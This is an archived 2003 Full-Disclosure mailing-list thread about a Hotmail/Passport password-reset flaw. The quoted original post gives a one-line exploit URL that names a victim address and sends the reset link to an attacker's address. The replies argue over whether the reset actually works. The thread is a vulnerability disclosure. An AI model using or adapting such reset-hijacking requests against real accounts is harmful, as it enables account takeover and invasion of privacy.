[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Sea1-DAV43MBhe3WYIg00001725@hotmail.com>
From: zoer_sec at hotmail.com (Suryanto)
Subject: Hotmail & Passport (.NET Accounts) Vulnerability
It did reset.
----- Original Message -----
From: "Christopher F. Herot" <cherot@...liedmessaging.com>
To: <mfrd@...itudex.com>; <full-disclosure@...ts.netsys.com>
Sent: Thursday, May 08, 2003 12:05 PM
Subject: RE: [Full-Disclosure] Hotmail & Passport (.NET Accounts)
Vulnerability
>
> I just tried this. It does indeed generate the "reset password" email
> and link, which is scary, but following the instructions does not really
> reset the password, at least not for the limited test I performed.
>
>
> > -----Original Message-----
> > From: Muhammad Faisal Rauf Danka [mailto:mfrd@...itudex.com]
> > Sent: Wednesday, May 07, 2003 10:51 PM
> > To: full-disclosure@...ts.netsys.com
> >
> > Hotmail & Passport (.NET Accounts) Vulnerability
> >
> > There is a very serious and stupid vulnerability or badcoding in
> Hotmail / Passport's (.NET
> > Accounts)
> >
> > I tried sending emails several times to Hotmail / Passport contact
> addresses, but always met with
> > the NLP bots.
> >
> > I guess I don't need to go in details of how cruical and important
> Hotmail / Passport's .NET
> > Account passport is to anyone.
> >
> > You name it and they have it, E-Commerce, Credit Card processing,
> Personal Emails, Privacy Issues,
> > Corporate Espionage, maybe stalkers and what not.
> >
> > It is so simple that it is funny.
> >
> > All you got to do is hit the following in your browser:
> >
> >
> https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmai
> l.com&id=&cb=&prefem=attac
> > ker@...acker.com&rst=1
> >
> > And you'll get an email on attacker@...acker.com asking you to click
> on a url something like this:
> >
> >
> http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLN
> um=0&lc=1033
> >
> > From that url, you can reset the password and I don't think I need to
> say anything more about it.
> >
> > Vulnerability / Flaw discovered : 12th April 2003
> > Vendor / Owner notified : Yes (as far as emailing
> them more than 10 times is concerned)
> >
> >
> > Regards
> > --------
> > Muhammad Faisal Rauf Danka
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
Powered by blists - more mailing lists